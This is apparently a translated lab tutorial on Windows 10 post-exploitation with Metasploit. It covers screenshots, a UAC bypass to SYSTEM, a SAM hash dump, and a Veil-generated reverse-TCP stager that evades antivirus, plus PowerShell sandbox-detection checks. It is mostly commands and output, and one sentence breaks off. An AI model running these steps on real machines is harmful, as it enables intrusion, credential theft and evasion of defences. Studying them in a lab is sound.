This is the 15th day of the PRO Co., Ltd. Advent calendar. Sorry for the late post!
This article is a continuation of "First Windows 10 Hacking". Reading it on its own should still give you a sense of "so this is actually possible?", but if you want to try it yourself, please also read the previous article (/items/1d035b0413ab60674ccb).
Last time, from the attack environment (Kali Linux) I attacked the target environment (Windows 10, built as a VM) with the Metasploit Framework (hereinafter Metasploit) and took remote control of it. This time, let's try some of the things an attacker does after breaking into the target machine:
- Taking screenshots
- Obtaining SYSTEM privileges
- Dumping the Windows password hashes
- Evading antivirus detection
Here it is assumed that a Meterpreter session has already been established (see the previous article, section "Allowing the target terminal to be controlled from the attacking terminal").
This article is not intended to encourage unauthorized access. **Never try what is introduced here on someone else's environment.**
Same as last time.
- Host OS: macOS 10.15.2 Beta
- Guest OS
  - Attack terminal: Kali Linux 5.3.0-kali2-amd64
  - Target terminal: Windows 10
- Virtualization software: VirtualBox 6.0.14 r133895 (Qt5.6.3)
| Terminal | IP address | 
|---|---|
| Kali Linux (attack terminal) | 10.0.0.2 | 
| Windows10 (target terminal) | 10.0.0.102 | 
Enter the following command to capture the screen currently displayed on the target terminal. The image is saved on the attacker's side, in the directory msfconsole was started from.
meterpreter > screenshot
Screenshot saved to: /root/ImgBawmm.jpeg
The red frame (in the original article's image, not reproduced here) is the screenshot of the target device.

Without administrator privileges many operations are restricted, so the next step is to escalate.
Check which user the session is running as.
meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa
Meterpreter provides a getsystem command that tries to elevate to SYSTEM, but here it fails. The reason is not that arakawa is a low-privileged account (the UAC bypass module confirms later that the user is a member of the Administrators group); it is that the process hosting the session runs with the filtered, medium-integrity token that UAC gives an administrator's ordinary processes.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Every technique getsystem tried needs an elevated administrator token, and User Account Control (UAC) withholds that token from a non-elevated process, so getsystem fails. The next step is therefore to find a module that bypasses UAC.
First, bring the Meterpreter prompt to the background and back to the msf prompt.
meterpreter > background
[*] Backgrounding session 1..
msf5 exploit(multi/handler) > 
Check the connected sessions.
msf5 exploit(multi/handler) > sessions -i
Active sessions
===============
  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F  10.0.0.2:4444 -> 10.0.0.102:50763 (10.0.0.102)
Search for modules with the keyword "bypassuac".
msf5 exploit(multi/handler) > search bypassuac
Matching Modules
================
   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------
   0   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   1   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   2   exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
   3   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   4   exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   5   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   6   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   7   exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
   8   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
   9   exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   10  exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
   11  exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
   12  exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
Use the following module; it runs its exploit through the already established session (hence the SESSION option below):
8 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup)
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_silentcleanup   <---- Input: select the module
msf5 exploit(windows/local/bypassuac_silentcleanup) > show targets  <---- Input: list the targets
Exploit targets:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 exploit(windows/local/bypassuac_silentcleanup) > set TARGET 0   <---- Input: set the target
TARGET => 0
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 1   <---- Input: set the session to run through
SESSION => 1
msf5 exploit(windows/local/bypassuac_silentcleanup) > set payload windows/x64/meterpreter/reverse_tcp   <---- Input: set the payload (x64, matching the session)
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 10.0.0.2   <---- Input: set the listening host (the attack terminal)
LHOST => 10.0.0.2
msf5 exploit(windows/local/bypassuac_silentcleanup) > show options   <---- Input: confirm the settings
Module options (exploit/windows/local/bypassuac_silentcleanup):
   Name       Current Setting                                          Required  Description
   ----       ---------------                                          --------  -----------
   PSH_PATH   %WINDIR%\System32\WindowsPowershell\v1.0\powershell.exe  yes       The path to the Powershell binary.
   SESSION    1                                                        yes       The session to run this module on.
   SLEEPTIME  0                                                        no        The time (ms) to sleep before running SilentCleanup
Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.2         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 exploit(windows/local/bypassuac_silentcleanup) > exploit   <---- Input: run it
[*] Started reverse TCP handler on 10.0.0.2:4444 
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:50983) at 2019-12-15 18:17:57 +0900
meterpreter >    <-- Success when a new meterpreter prompt (session 2) comes back
meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa   <-- Still the same user; the difference is that session 2 runs in an elevated (high-integrity) process
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM   <-- SYSTEM privileges
You now have SYSTEM privileges. Note that this only worked because arakawa is a member of the Administrators group ("Part of Administrators group!" above): a UAC bypass turns an administrator's filtered token into a full one, it does not turn a standard user into an administrator.
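To see concretely what changed between session 1 and session 2, the following added example (not from the original article) inspects the access token of the current process. Run it in a PowerShell on the target machine, for instance launched from Meterpreter with execute -f powershell.exe -i -H, once in session 1 and once in session 2. The integrity-level mapping is taken from the documented S-1-16-* RIDs; the privilege names are the ones getsystem's techniques rely on.

```powershell
# Added example, not from the original article: report the properties of the
# current process token that decide whether getsystem can succeed.
function Get-TokenState {
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)
    $adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator

    # whoami prints SIDs, which are identical in every Windows language,
    # so the parsing below does not depend on the locale of the target.
    $groupText = (whoami /groups) -join "`n"
    $privText  = (whoami /priv)   -join "`n"

    # The integrity label is the group SID S-1-16-<RID>; the RID is the level
    # (documented values: Low 4096, Medium 8192, High 12288, System 16384).
    $levels = @{ 4096 = 'Low'; 8192 = 'Medium'; 12288 = 'High'; 16384 = 'System' }
    $match  = [regex]::Match($groupText, 'S-1-16-(\d+)')
    $integrity = 'Unknown'
    if ($match.Success) {
        $rid = [int]$match.Groups[1].Value
        if ($levels.ContainsKey($rid)) { $integrity = $levels[$rid] }
    }

    [pscustomobject]@{
        User                   = $identity.Name
        # S-1-5-32-544 = BUILTIN\Administrators. UAC leaves the SID in the token
        # of an admin's ordinary processes but flags it "used for deny only".
        AdminSidInToken        = ($groupText -match 'S-1-5-32-544')
        # IsInRole honours that flag: False in the filtered medium-integrity
        # token, True only in an elevated (high-integrity) process.
        ElevatedAdminToken     = $principal.IsInRole($adminRole)
        IntegrityLevel         = $integrity
        # A filtered token carries neither privilege; getsystem's token
        # duplication technique, for example, needs SeDebugPrivilege.
        SeDebugPrivilege       = ($privText -match 'SeDebugPrivilege')
        SeImpersonatePrivilege = ($privText -match 'SeImpersonatePrivilege')
    }
}

Get-TokenState | Format-List
```

In session 1 the expected picture is AdminSidInToken True, ElevatedAdminToken False, IntegrityLevel Medium and both privileges False, which is exactly the state in which every getsystem technique fails; in session 2 the same user shows ElevatedAdminToken True, IntegrityLevel High and both privileges present, and getsystem succeeds with technique 1.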
One thing you can do with SYSTEM privileges is dump the password hashes. Dumped hashes are mainly used for cracking Windows passwords offline; password cracking is not covered in this article.
For local accounts, logon authentication uses the SAM database (the C:\Windows\System32\config\SAM hive), in which each password is stored as a hash rather than in clear text. The hive itself is additionally encrypted with the boot key (SYSKEY) kept in the SYSTEM hive, which is why the output below first derives that key before it can decrypt the per-user keys.
In Metasploit you can dump the hashes with run hashdump. As the warning below says, the script is deprecated in favour of the post/windows/gather/smart_hashdump module (Meterpreter's built-in hashdump command does the same job). Without SYSTEM privileges the SAM hive cannot be read and the command fails with an error.
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d1584c448032fe34d1e8e158d04561ed...
/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
<Password hash>
It is output in the 
Finally, establish a Meterpreter session while evading detection by antivirus software.
Veil Framework (hereinafter Veil) is a set of tools that generate payloads designed to evade antivirus.
Veil is not installed on Kali Linux by default, so install it separately.
root@kali:~# apt install veil-evasion
Run the following command from a GUI session on Kali (the first-run setup needs a display). Partway through you are asked whether to install the dependencies; answer "s" (silent install).
root@kali:~# veil
===============================================================================
                             Veil | [Version]: 3.1.12
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Main Menu
	2 tools loaded
Available Tools:
	1)	Evasion
	2)	Ordnance
Available Commands:
	exit			Completely exit Veil
	info			Information on a specific tool
	list			List available tools
	options			Show Veil configuration
	update			Update Veil
	use			Use a specific tool
Veil>: 
 [!] ERROR #2-3: Can't find the WINE profile for Ruby v1.8.7 (/var/lib/veil/wine//drive_c/Ruby187/bin/ruby.exe).   Run: /usr/share/veil/config/setup.sh --force --silent
If the startup error above about the missing WINE profile for Ruby appears, run the setup script it names (/usr/share/veil/config/setup.sh --force --silent) before continuing; the update command below only refreshes the apt package. Detection and evasion techniques are updated constantly, so keep Veil updated to maximize the chance that evasion still works.
Veil>: update
Hit:1 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree       
Reading state information... Done
veil is already the newest version (3.1.12-0kali1).
veil set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 203 not upgraded.
Veil has checked for updates, press enter to continue
Two tools, Evasion and Ordnance, are loaded. Choose Evasion, which generates the detection-evading payloads (Ordnance only generates raw shellcode).
Veil>: use 1
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Veil-Evasion Menu
	41 payloads loaded
Available Commands:
	back			Go to Veil's main menu
	checkvt			Check VirusTotal.com against generated hashes
	clean			Remove generated artifacts
	exit			Completely exit Veil
	info			Information on a specific payload
	list			List available payloads
	use			Use a specific payload
From the list, select powershell/meterpreter/rev_tcp.py, a pure-PowerShell reverse TCP Meterpreter stager for Windows (no shellcode involved, as the payload information below states).
Veil/Evasion>: list   <--input
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
 [*] Available Payloads:
	1)	autoit/shellcode_inject/flat.py
	2)	auxiliary/coldwar_wrapper.py
<Omitted>
	22)	powershell/meterpreter/rev_tcp.py
<Omitted>
	41)	ruby/shellcode_inject/flat.py
Veil/Evasion>: use 22   <--input
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
 Payload Information:
	Name:		Pure PowerShell Reverse TCP Stager
	Language:	powershell
	Rating:		Excellent
	Description:    pure windows/meterpreter/reverse_tcp stager, no
	                shellcode
Payload: powershell/meterpreter/rev_tcp selected
 Required Options:
Name            	Value   	Description
----            	-----   	-----------
BADMACS         	FALSE   	Checks for known bad mac addresses
DOMAIN          	X       	Optional: Required internal domain
HOSTNAME        	X       	Optional: Required system hostname
LHOST           	        	IP of the Metasploit handler
LPORT           	4444    	Port of the Metasploit handler
MINBROWSERS     	FALSE   	Minimum of 2 browsers
MINPROCESSES    	X       	Minimum number of processes running
MINRAM          	FALSE   	Require a minimum of 3 gigs of RAM
PROCESSORS      	X       	Optional: Minimum number of processors
SLEEP           	X       	Optional: Sleep "Y" seconds, check if accelerated
USERNAME        	X       	Optional: The required user account
USERPROMPT      	FALSE   	Window pops up prior to payload
UTCCHECK        	FALSE   	Check that system isn't using UTC time zone
VIRTUALPROC     	FALSE   	Check for known VM processes
 Available Commands:
	back        	Go back to Veil-Evasion
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option
[powershell/meterpreter/rev_tcp>>]: set LHOST 10.0.0.2   <-- Input: the attack terminal is the host to connect back to
[powershell/meterpreter/rev_tcp>>]: options   <-- Input: confirm the settings
<Omitted>
Generate the payload with the generate command.
[powershell/meterpreter/rev_tcp>>]: generate   <--input
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
 [>] Please enter the base name for output files (default is payload): evil3   <-- Input: the base name for the output files
<Omitted>
Exit Veil with the exit command and copy the generated payload to the desktop. The output is a .bat file that launches the PowerShell stager.
Veil/Evasion>: exit
root@kali:~# cp /var/lib/veil/output/source/evil3.bat /root/Desktop
A payload generated by Metasploit itself is detected both on download and on execution unless Windows real-time protection is disabled, so no session can be established; the payload generated here could be downloaded and executed without being detected (as of December 2019; detection results change as antivirus signatures are updated).
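Several of the options in the payload menu above (VIRTUALPROC, BADMACS, MINRAM, MINPROCESSES, UTCCHECK) are environment checks that the generated stager performs before connecting back, so that it stays inert inside an analysis sandbox. The following added example, which is neither from the article nor Veil's own code, shows what such checks amount to in PowerShell. Each function returns $true when its check passes, that is, when a stager generated with that option set to TRUE would go on to run. The process names, MAC prefixes and the process-count threshold are assumptions made here, not Veil's actual values.

```powershell
# Added example, not from the article and not Veil's code: environment checks
# of the kind the payload options enable, so you can predict in advance whether
# a generated stager will detonate on a given machine.

# VIRTUALPROC: guest-tools processes of VMware and VirtualBox (assumed list).
$vmProcessNames = @('vmtoolsd', 'vmwaretray', 'vmwareuser', 'VBoxService', 'VBoxTray')

function Test-NoVmProcesses {
    $running = (Get-Process).ProcessName          # -contains is case-insensitive
    foreach ($name in $vmProcessNames) {
        if ($running -contains $name) { return $false }
    }
    return $true
}

# BADMACS: OUIs registered to VMware (00-05-69, 00-0C-29, 00-50-56) and the
# VirtualBox default NIC (08-00-27). Assumed list.
$badMacPrefixes = @('00-05-69', '00-0C-29', '00-50-56', '08-00-27')

function Test-NoBadMacs {
    foreach ($adapter in Get-NetAdapter) {
        $mac = [string]$adapter.MacAddress         # e.g. 08-00-27-1A-2B-3C
        if ($mac.Length -ge 8 -and $badMacPrefixes -contains $mac.Substring(0, 8).ToUpper()) {
            return $false
        }
    }
    return $true
}

# MINRAM: the option description asks for at least 3 GB of physical memory.
function Test-MinRam {
    $bytes = (Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory
    return ($bytes -ge 3GB)
}

# MINPROCESSES: a freshly booted sandbox runs far fewer processes than a
# real desktop. The threshold is an assumption.
function Test-MinProcesses([int]$Minimum = 50) {
    return ((Get-Process).Count -ge $Minimum)
}

# UTCCHECK: many analysis sandboxes keep the system clock on UTC.
function Test-NotUtc {
    return ([TimeZoneInfo]::Local.BaseUtcOffset -ne [TimeSpan]::Zero)
}

function Get-EnvironmentCheckReport {
    [pscustomobject]@{
        VIRTUALPROC  = Test-NoVmProcesses
        BADMACS      = Test-NoBadMacs
        MINRAM       = Test-MinRam
        MINPROCESSES = Test-MinProcesses
        UTCCHECK     = Test-NotUtc
    }
}

Get-EnvironmentCheckReport
```

On the VirtualBox target used in this article, BADMACS comes back False (the NIC carries the 08-00-27 prefix) and VIRTUALPROC comes back False if Guest Additions are installed (VBoxService is running), so a payload generated with those options set to TRUE would never call back. That is the same property that keeps such a sample from detonating in an analysis VM, and it is why the article leaves them at FALSE.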
Place the generated payload in a folder served over HTTP, then start a Metasploit handler waiting for the reverse connection. Set the payload to windows/meterpreter/reverse_tcp, the stager the Veil payload is built for (see its description above).
root@kali:~# cp /root/Desktop/evil3.bat /var/www/html/share/ 
root@kali:~# service apache2 restart
root@kali:~# msfconsole
<Omitted>
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf5 exploit(multi/handler) > exploit
Download evil3.bat on the target machine. At this point it is not detected as malware.
Double-click evil3.bat. A warning dialog appears; open its details and choose to run the file anyway.
If Kali reacts and a Meterpreter prompt comes back, the session was established without being detected. If no prompt appears, some function of the security software may have blocked it.
This time I had a hard time getting SYSTEM privileges, because the session was not established properly and Veil did not start. Basically everything is prepared so that you can do it with one command, and I thought it was easy, but once something goes wrong it becomes hard to deal with if you do not understand what is going on underneath. It is scary that even someone like that can do this relatively easily.
[IPUSIRON, "How to make a hacking lab: hacker experience learning in a virtual environment", Shoeisha (amazon)](https://www.amazon.co.jp/dp/B07JJKLZNW), and the FAQ on the book's support site.